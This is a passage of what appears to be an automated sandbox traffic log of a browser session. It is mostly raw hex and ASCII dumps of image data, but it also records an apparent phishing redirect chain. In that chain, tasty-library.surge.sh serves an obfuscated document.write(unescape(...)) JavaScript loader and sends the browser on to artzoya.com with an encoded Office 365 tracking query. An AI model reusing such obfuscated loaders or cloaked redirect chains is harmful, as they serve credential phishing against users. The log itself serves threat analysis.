                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC1378INData Raw: 62 32 4a 6c 49 46 68 4e 55 43 42 44 62 33 4a 6c 49 44 55 75 4d 79 31 6a 4d 44 45 78 49 44 59 32 4c 6a 45 30 4e 54 59 32 4d 53 77 67 4d 6a 41 78 4d 69 38 77 4d 69 38 77 4e 69 30 78 4e 44 6f 31 4e 6a 6f 79 4e 79 41 67 49 43 41 67 49 43 41 67 49 6a 34 67 50 48 4a 6b 5a 6a 70 53 52 45 59 67 65 47 31 73 62 6e 4d 36 63 6d 52 6d 50 53 4a 6f 64 48 52 77 4f 69 38 76 64 33 64 33 4c 6e 63 7a 4c 6d 39 79 5a 79 38 78 4f 54 6b 35 4c 7a 41 79 4c 7a 49 79 4c 58 4a 6b 5a 69 31 7a 65 57 35 30 59 58 67 74 62 6e 4d 6a 49 6a 34 67 50 48 4a 6b 5a 6a 70 45 5a 58 4e 6a 63 6d 6c 77 64 47 6c 76 62 69 42 79 5a 47 59 36 59 57 4a 76 64 58 51 39 49 69 49 67 65 47 31 73 62 6e 4d 36 65 47 31 77 50 53 4a 6f 64 48 52 77 4f 69 38 76 62 6e 4d 75 59 57 52 76 59 6d 55 75 59 32 39 74 4c 33 68
                                                                                                                                                                                                                                                                                          Data Ascii: b2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3h
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC1378INData Raw: 74 34 32 66 2b 4d 70 30 79 55 54 56 51 62 64 57 73 41 48 56 73 69 6b 64 69 48 6b 48 61 50 78 63 51 58 51 75 66 58 67 55 42 67 4d 52 78 6d 65 39 55 30 41 41 78 66 48 34 76 46 76 6a 4d 37 65 46 36 55 6b 62 4a 53 35 71 6f 51 77 45 51 47 41 35 37 41 63 35 4a 6c 6c 46 79 55 56 5a 5a 35 63 6b 55 45 67 4d 56 78 73 4b 32 6a 6c 53 59 7a 49 2b 51 58 4a 73 69 79 6a 7a 4e 45 41 4a 79 4a 41 7a 62 2f 4b 51 61 34 31 6a 4a 4b 4c 38 70 4f 44 4d 51 69 54 45 41 79 6d 58 77 35 6e 38 2f 50 30 49 6a 44 33 62 68 37 52 67 6f 67 35 39 61 61 6e 78 69 49 52 54 56 76 56 2f 6f 6a 30 74 6e 48 63 61 2f 57 4d 72 56 77 4f 44 77 42 33 72 61 54 47 78 7a 6b 42 67 2f 67 6e 5a 56 61 70 46 56 36 32 57 79 32 6e 35 41 4f 37 30 48 4d 2f 35 77 62 4a 30 51 6e 58 79 51 53 61 56 50 44 49 75 4e 5a 7a
                                                                                                                                                                                                                                                                                          Data Ascii: t42f+Mp0yUTVQbdWsAHVsikdiHkHaPxcQXQufXgUBgMRxme9U0AAxfH4vFvjM7eF6UkbJS5qoQwEQGA57Ac5JllFyUVZZ5ckUEgMVxsK2jlSYzI+QXJsiyjzNEAJyJAzb/KQa41jJKL8pODMQiTEAymXw5n8/P0IjD3bh7Rgog59aanxiIRTVvV/oj0tnHca/WMrVwODwB3raTGxzkBg/gnZVapFV62Wy2n5AO70HM/5wbJ0QnXyQSaVPDIuNZz
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC847INData Raw: 36 73 64 34 32 39 54 55 4e 45 63 6d 55 64 63 2b 50 52 61 4c 48 63 76 6e 38 37 64 58 57 34 75 67 7a 64 73 61 47 78 75 66 4c 39 34 4e 46 76 39 7a 69 31 4a 37 47 56 62 68 6c 76 62 32 64 6e 61 4a 33 53 56 72 78 66 63 2b 6e 32 2b 4e 54 73 5a 37 2f 48 37 2f 4d 72 33 67 35 58 64 53 49 48 79 4a 53 48 31 50 5a 2b 37 66 54 6f 79 6c 32 2b 45 72 71 69 6c 67 5a 34 4e 61 4c 59 42 39 67 6f 56 47 61 48 6a 52 39 33 48 76 31 5a 72 55 34 58 44 73 46 54 32 30 6b 48 33 50 4f 62 7a 62 57 6b 30 43 67 47 31 6a 61 63 56 49 55 6e 41 51 62 39 46 2b 56 65 78 79 4c 4d 7a 6b 70 63 4c 76 30 49 4a 56 37 41 48 51 49 4f 43 41 55 59 48 78 37 76 35 71 67 53 63 6d 59 48 74 54 71 53 41 79 5a 4c 45 4a 54 4b 32 32 42 69 65 34 69 71 33 78 73 71 70 6d 34 53 41 66 39 48 71 39 61 32 44 6e 4a 34 75
                                                                                                                                                                                                                                                                                          Data Ascii: 6sd429TUNEcmUdc+PRaLHcvn87dXW4ugzdsaGxufL94NFv9zi1J7GVbhlvb2dnaJ3SVrxfc+n2+NTsZ7/H7/Mr3g5XdSIHyJSH1PZ+7fToyl2+ErqilgZ4NaLYB9goVGaHjR93Hv1ZrU4XDsFT20kH3PObzbWk0CgG1jacVIUnAQb9F+VexyLMzkpcLv0IJV7AHQIOCAUYHx7v5qgScmYHtTqSAyZLEJTK22Bie4iq3xsqpm4SAf9Hq9a2DnJ4u


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          11192.168.2.749739199.232.188.1594435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC380OUTGET /media/GGrR89_WgAAgrOI?format=jpg&name=large HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: pbs.twimg.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC740INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Content-Length: 39755
                                                                                                                                                                                                                                                                                          perf: 7402827104
                                                                                                                                                                                                                                                                                          cache-tag: media,media/bucket/3,media/1759449449804234752
                                                                                                                                                                                                                                                                                          content-type: image/jpeg
                                                                                                                                                                                                                                                                                          cache-control: max-age=604800, must-revalidate
                                                                                                                                                                                                                                                                                          last-modified: Mon, 19 Feb 2024 05:24:52 GMT
                                                                                                                                                                                                                                                                                          x-transaction-id: f067b583c6195c32
                                                                                                                                                                                                                                                                                          timing-allow-origin: https://twitter.com, https://mobile.twitter.com
                                                                                                                                                                                                                                                                                          strict-transport-security: max-age=631138519
                                                                                                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                                                                                                          access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:40:53 GMT
                                                                                                                                                                                                                                                                                          X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                          x-tw-cdn: FT
                                                                                                                                                                                                                                                                                          x-served-by: cache-lhr-egll1980036-LHR, cache-muc13956-MUC, cache-tw-ZZZ1
                                                                                                                                                                                                                                                                                          Server-Timing: x-cache;desc=HIT, x-tw-cdn;desc=FT
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC1379INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0b 0b 09 0c 11 0f 12 12 11 0f 11 11 13 16 1c 17 13 14 1a 15 11 11 18 21 18 1a 1d 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c2 00 11 08 02 76 07 30 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 01 00 03 01 01 01 01 01 00 00 00 00 00 00 00 00 00 05 06 07 01 04 03 02 08 ff c4 00 1b 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 03 06 02 04 05 01 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 d9 40 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: JFIFC!"$"$Cv0"@
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC1379INData Raw: 2c 39 d2 7f 38 0e f0 3b ce f0 3a 39 d0 38 3b c0 eb 83 bc e8 e1 d3 8e f0 e9 c1 de 07 41 ce f0 03 a0 71 d3 80 eb 80 74 e1 d3 9d e7 47 00 ef 0e 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 1b 25 1b 24 79 c1 cb 25 6f a0 00 04 ec 14 ec 13 5b 2b 96 3a ef ce 6e dc 1c bd a0 00 02 5e 6e 12 6e d3 c9 3a e8 6b f1 d1 cf c7 e3 2a 2f 1e 1a 17 b0 bd 4f e3 97 d2 de e8 e3 bc 3b c0 3a 1c 74 e7 79 d3 8e 80 39 d0 e7 43 8e f0 3b c2 13 c9 53 8a 36 73 cc 7a 7b 48 b4 9e de 87 3a 1c 74 73 bc e9 c7 78 77 9d 1c 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: ,98;:98;AqtG%$y%o[+:n^nn:k*/O;:ty9C;S6sz{H:tsxwt
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC1379INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC1379INData Raw: 00 00 00 00 67 f5 6b 4d 58 d7 72 6d 97 05 36 ea 35 ce 00 f0 5e 32 ab 89 0a 83 d5 8f 16 41 b0 51 08 bd 52 af 7b 00 ae d7 7f 36 e2 81 a6 66 36 22 ee 08 7c e3 5f fe 70 34 fa ae b9 4d 24 2a 7f 3d 80 cb f5 0f e7 4f e8 52 0a bb 41 fe 83 32 9b df 70 b3 76 ce 35 ff 00 e7 03 4f aa eb 94 d2 42 a7 f3 d8 0c bf 50 fe 74 fe 81 20 60 69 da 11 5c d3 f0 5d 28 85 fb f8 a4 ca e5 d6 77 1c 36 0f e7 df e9 cf e7 13 51 be 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 e7 9e ad 68 86 35 ac 17 7a c2 0d 96 02 4e b4 42 eb 59 0d dc a2 56 f7 ea 71 65 a1 f3 f6 4b 5e e8 17 73 d0 0a f5 4e 9d b1 99 cd 9a bd 3c 5f 80 fe 73 fe 8c fe 73 3f
                                                                                                                                                                                                                                                                                          Data Ascii: gkMXrm65^2AQR{6f6"|_p4M$*=ORA2pv5OBPt `i\](w6Q(h5zNBYVqeK^sN<_ss?
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC1379INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1f ff c4 00 35 10 00 02 02 01 02 04 05 03 03 03 04 02 03 00 00 00 04 05 02 03 01 00 06 14 15 34 35 10 11 12 13 30 20 33 70 21 32 36 16 31 40 22 24 25 60 50 80 90 a0 c0 ff da 00 08 01 01 00 01 05 02 ff 00 dd 3b ac 8d 35 73 60 b5 cd 82
                                                                                                                                                                                                                                                                                          Data Ascii: 5450 3p!261@"$%`P;5s`
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC1379INData Raw: 87 3e 78 45 7e 87 47 44 33 ab 52 55 65 ab 96 c0 3b 7c 4c 52 2d f9 92 1b 75 14 36 e8 45 22 d1 9d 67 1e 78 bd 15 59 d6 51 5f aa 50 fe a2 8d 48 d0 f0 2d 38 d7 66 48 6e d4 10 d9 e6 1a b1 47 cf 83 15 b0 32 ea 92 55 5d 9e 06 89 49 75 d8 86 cf 3a 90 cf ce b8 fa 2b fc 30 65 59 bc 6e 49 6e b9 25 ba e4 96 eb 92 5b ae 49 6e b9 25 ba e4 96 eb 92 5b ae 49 6e 96 ad 98 a4 9b 4e 6f a3 95 59 ae 55 66 b9 55 9a e5 56 6b 95 59 ae 55 66 b9 55 9a e5 56 6b 95 59 a5 e2 48 69 7e 50 22 cc 53 4f 37 ab 5c e2 ad 73 7a b5 cd ea d7 37 ab 5c de ad 73 8a b5 cd ea d7 37 ab 42 30 81 37 5d 66 2a 87 1b 0d 71 b0 d7 1b 0d 71 b0 d7 1b 0d 71 b0 d7 1b 0d 71 b0 d7 1b 0d 51 7e 2e cf e5 06 7d 07 c2 8f ae 3f a7 f8 56 fe ef aa 72 8c 23 73 91 21 9e 7d 56 ab 76 2c b4 3d f5 11 0f f2 18 b2 a8 3c 84 e2 ab
                                                                                                                                                                                                                                                                                          Data Ascii: >xE~GD3RUe;|LR-u6E"gxYQ_PH-8fHnG2U]Iu:+0eYnIn%[In%[InNoYUfUVkYUfUVkYHi~P"SO7\sz7\s7B07]f*qqqqQ~.}?Vr#s!}Vv,=<
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC1379INData Raw: 95 6e 5e 67 92 36 f4 dd 44 25 99 33 22 78 3c 6b 52 ca 40 cb d6 74 16 c9 ca 72 c2 22 b2 c5 f0 66 c2 95 f0 27 74 93 6d a7 bf b6 76 c9 fb 91 6f fe a0 0f 0b 0b 72 f6 51 45 b8 ee b8 ad 3a 6e 3a c8 0d 76 e3 61 59 2d 9d ab bd 43 31 d9 52 cd 85 2b e0 4e e9 26 db 4f 7f 6c ed 93 f7 22 df fd 40 1e 16 16 e5 ec a2 8b 71 dd 71 5a 74 e2 b0 33 64 b7 54 e0 06 e6 22 ab e5 74 38 66 3b 9c 88 48 5d c5 98 2b 31 c3 fa b3 b6 dc e5 8e 1c 48 fc 08 44 6d 89 34 d9 b9 fd ef c6 3b eb b5 ec 7e ef ad d9 df d5 76 bd e3 d8 f6 27 59 bb 71 3c a2 da 6d e9 0e 37 c2 a2 c4 4a 35 82 2c df da d8 fd a3 c7 75 28 30 e2 92 8b 30 d5 ef 8b e8 b7 3b 2a 5e a4 de 2d e3 88 b6 04 4a 02 1f 7c 53 19 2e d9 02 d1 79 1a 6b 0c 0a e2 eb 23 55 02 fa 9a bd c7 e9 a7 41 e0 e5 aa 0b 98 2c 34 de 38 8b 60 44 a0 21 f7 c5
                                                                                                                                                                                                                                                                                          Data Ascii: n^g6D%3"x<kR@tr"f'tmvorQE:n:vaY-C1R+N&Ol"@qqZt3dT"t8f;H]+1HDm4;~v'Yq<m7J5,u(00;*^-J|S.yk#UA,48`D!
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC1379INData Raw: 9f 16 dd b4 41 b4 57 57 60 d1 58 fb ed cf 63 c2 b0 62 f7 01 b0 93 7e 1d 56 5e 95 4e 2a b2 16 d5 ff 00 71 62 1d 67 6e e8 ed 75 d8 96 e8 ae 14 ed c7 1e ee 66 7d 0f 6c 0e eb a2 02 07 10 77 95 78 a4 62 36 a5 b8 7c b8 67 b7 e0 b0 8a a5 fc c5 db 34 e6 85 3b 82 91 88 5f 6e 1f 2e 19 f1 15 95 b5 5f 17 01 c1 71 07 79 56 77 f0 75 f0 8e 14 57 99 7f 47 03 ed f0 1b 2f d3 ec b6 ed 5b 47 d1 c8 97 e2 39 de 21 93 c9 f5 b5 85 e1 93 eb 76 0f ef a6 cf fc e9 81 dd cc a6 da 38 96 ec de bd 99 bf 75 af f9 b2 58 b3 99 d7 8a c2 6d f4 ce cc 2c dc a3 53 c0 d4 ab d5 70 5b 72 0e 32 b1 58 a4 c3 71 68 42 8f 38 85 b1 22 1b b9 14 71 fd 46 db 05 4b 77 38 19 c5 c1 01 1c c0 1d d7 fa b1 63 91 70 13 6c 0f 36 3b bb b0 b7 f7 65 23 e8 7b 60 65 d5 ed d2 c7 22 e0 27 f8 f5 93 b6 b3 cb 9a 5f fc d9 6c
                                                                                                                                                                                                                                                                                          Data Ascii: AWW`Xcb~V^N*qbgnuf}lwxb6|g4;_n._qyVwuWG/[G9!v8uXm,Sp[r2XqhB8"qFKw8cpl6;e#{`e"'_l
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC1379INData Raw: fd 7f 9a a1 1a 8c ca f1 49 a1 16 af da 58 67 0c 5a a1 1a 8c ca f1 49 a1 16 af da 58 67 0c 5a a1 1a 8c ca f1 49 a1 16 af da 58 67 0c 5a a1 1a 8c ca f1 49 a1 16 af da 58 67 0c 5a a1 33 f4 6c 8c c5 f9 1c c5 f9 1c c5 f9 1c c5 f9 1c c2 cf 69 34 99 91 08 83 92 ab 2b 69 82 18 5b c6 43 0b 78 c8 61 6f 19 0c 2d e3 20 e2 93 49 22 4c b5 fb fe 9f 3f ff c4 00 4f 10 00 01 02 03 03 07 06 0c 03 05 05 06 07 00 00 00 01 02 03 00 04 11 12 21 31 05 10 13 22 32 41 71 33 42 51 61 72 91 14 20 23 30 52 70 73 81 82 a1 b1 c1 62 92 d1 15 34 40 43 f0 63 83 b2 c2 e1 24 50 60 74 a2 f1 53 80 90 a0 a3 c0 d2 ff da 00 08 01 01 00 06 3f 02 ff 00 ce 99 71 7b 23 18 e5 15 f9 63 94 57 e5 8e 51 5f 96 39 43 f9 63 94 57 e5 8e 51 5f 96 39 45 7e 58 e5 0f e5 8e 51 5f 96 34 6d 28 95 70 8b 6b 34 11 b6
                                                                                                                                                                                                                                                                                          Data Ascii: IXgZIXgZIXgZIXgZ3li4+i[Cxao- I"L?O!1"2Aq3BQar #0Rpsb4@Cc$P`tS?q{#cWQ_9CcWQ_9E~XQ_4m(pk4
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC1379INData Raw: 43 dd b3 0b ec 67 33 4c 8a fa 63 ef 9a c8 72 d0 fc 57 c5 2d 25 1d 91 15 30 26 9e 14 03 60 42 fb 26 3c 8b 85 3d 51 7a 1a 3e e8 1a 52 28 30 02 12 d2 07 13 d1 01 23 00 29 06 69 a1 54 1d a1 d1 9a cd b0 b1 f8 84 59 b6 10 3f 08 cd e1 4f 0a 1e 60 fb e6 47 62 1a ed 8c ee 5d 72 8d a1 01 c6 d5 65 42 2c da 40 eb 09 86 c9 bc 94 8f 53 2f 70 f3 5f 09 83 c4 79 a7 38 78 ca 64 aa c8 3b e3 97 5f 74 21 a0 6b 64 53 32 da 56 0a 14 8e 5d 7d d0 12 9c 00 a6 6d 12 94 53 7d 6e 8e 5d 7d d0 86 41 a8 4e f8 0d a9 65 34 35 ba 39 75 f7 42 51 e8 8a 66 f2 a8 bf d2 18 c7 92 7c 53 f1 08 bd e6 e2 af 2c b9 d5 80 cc a5 e9 d7 ac 6b 84 17 12 e2 95 51 4b c7 89 68 55 a5 74 a6 35 5f 41 e2 23 59 f4 0e 02 2d 2a ae ab f1 66 20 ef 8a b2 f2 93 d4 6f 8e 59 b8 f2 cf fe 51 16 19 45 9f be 7b 48 ab 4a ea c2
                                                                                                                                                                                                                                                                                          Data Ascii: Cg3LcrW-%0&`B&<=Qz>R(0#)iTY?O`Gb]reB,@S/p_y8xd;_t!kdS2V]}mS}n]}ANe459uBQf|S,kQKhUt5_A#Y-*f oYQE{HJ


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          12192.168.2.749741138.197.235.1234435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:01 UTC693OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: tasty-library.surge.sh
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                          Referer: https://sharedfiles2.github.io/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:01 UTC440INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: Surge
                                                                                                                                                                                                                                                                                          Surge-Cache: HIT
                                                                                                                                                                                                                                                                                          Surge-Stamp: 9390::1726700333183-257cdfe7ca10a13d99049de9527a7729
                                                                                                                                                                                                                                                                                          Age: 306773
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:01 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                          ETag: "47539426f29d770524a58d37ec2241127fae899018043d9f00326ce26bc365a4"
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Response-Time: 3ms
                                                                                                                                                                                                                                                                                          Content-Length: 1538
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:01 UTC1538INData Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 6a 61 76 61 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 36 43 25 36 31 25 36 45 25 36 37 25 37 35 25 36 31 25 36 37 25 36 35 25 33 44 25 32 32 25 36 41 25 36 31 25 37 36 25 36 31 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 32 25 33 45 25 36 36 25 37 35 25 36 45 25 36 33 25 37 34 25 36 39 25 36 46 25 36 45 25 32 30 25 36 34 25 34 36 25 32 38 25 37 33 25 32 39 25 37 42 25 37 36 25 36 31 25 37 32 25 32 30 25 37 33 25 33 31 25 33 44 25 37 35 25 36 45 25 36 35 25 37 33 25 36 33 25 36 31 25 37 30 25 36 35 25 32 38 25 37 33 25 32 45 25 37 33 25 37 35 25 36 32 25 37 33 25
                                                                                                                                                                                                                                                                                          Data Ascii: <script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          13192.168.2.74974488.135.68.234435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:03 UTC763OUTGET /o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5VaHBaRWc9JnVpZD1VU0VSMTcwOTIwMjRVMDQwOTE3NTA=N0123N HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: artzoya.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                          Referer: https://tasty-library.surge.sh/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:08 UTC431INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                          location: https://google.com/404/
                                                                                                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          content-length: 1
                                                                                                                                                                                                                                                                                          date: Fri, 27 Sep 2024 14:41:08 GMT
                                                                                                                                                                                                                                                                                          vary: User-Agent
                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:08 UTC1INData Raw: 0a
                                                                                                                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          14192.168.2.749742138.197.235.1234435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
